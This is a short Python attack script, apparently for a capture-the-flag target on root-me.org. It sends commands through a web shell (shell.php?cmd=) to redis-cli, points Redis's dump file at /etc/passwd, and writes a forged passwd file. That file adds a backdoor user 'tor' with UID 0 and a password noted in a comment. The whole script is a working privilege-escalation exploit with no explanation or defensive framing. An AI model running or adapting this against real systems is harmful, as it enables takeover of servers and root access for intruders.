import requests
url='http://ctf01.root-me.org/shell.php?cmd=redis-cli '
s=requests.Session()
s.get(url+'config set dir /etc')
s.get(url+'config set dbfilename passwd')
s.get(url+'set "$(printf \'\nroot:x:0:0:\')" "$(printf \':/root:/bin/bash\')"')
s.get(url+'set "$(printf \'\nbin:x:1:1:\')" "$(printf \':/bin:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\ndaemon:x:2:2:\')" "$(printf \':/sbin:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nadm:x:3:4:\')" "$(printf \':/var/adm:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nlp:x:4:7:\')" "$(printf \':/var/spool/lpd:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nsync:x:5:0:\')" "$(printf \':/sbin:/bin/sync\')"')
s.get(url+'set "$(printf \'\nshutdown:x:6:0:\')" "$(printf \':/sbin:/sbin/shutdown\')"')
s.get(url+'set "$(printf \'\nhalt:x:7:0:\')" "$(printf \':/sbin:/sbin/halt\')"')
s.get(url+'set "$(printf \'\nmail:x:8:12:\')" "$(printf \':/var/spool/mail:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\noperator:x:11:0:\')" "$(printf \':/root:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\ngames:x:12:100:\')" "$(printf \':/usr/games:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nftp:x:14:50:\')" "$(printf \':/var/ftp:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nnobody:x:99:99:\')" "$(printf \':/:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\ndbus:x:81:81:\')" "$(printf \':/:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\npolkitd:x:999:998:\')" "$(printf \':/:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\navahi:x:70:70:\')" "$(printf \':/var/run/avahi\')"')
s.get(url+'set "$(printf \'\navahi\')" "$(printf \'autoipd:x:170:170:\')"')
s.get(url+'set "$(printf \'\npostfix:x:89:89:\')" "$(printf \':/var/spool/postfix:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nsshd:x:74:74:\')" "$(printf \':/var/empty/sshd:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\napache:x:48:48:\')" "$(printf \':/usr/share/httpd:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\nsystemd\')" "$(printf \'network:x:192:192:\')"')
s.get(url+'set "$(printf \'\ntss:x:59:59:\')" "$(printf \':/dev/null:/sbin/nologin\')"')
s.get(url+'set "$(printf \'\ntor:ab01FAX.bQRSU:0:0:\')" "$(printf \':/root:/bin/bash\')"') #user: tor ; pass: 123456
s.get(url+'save')
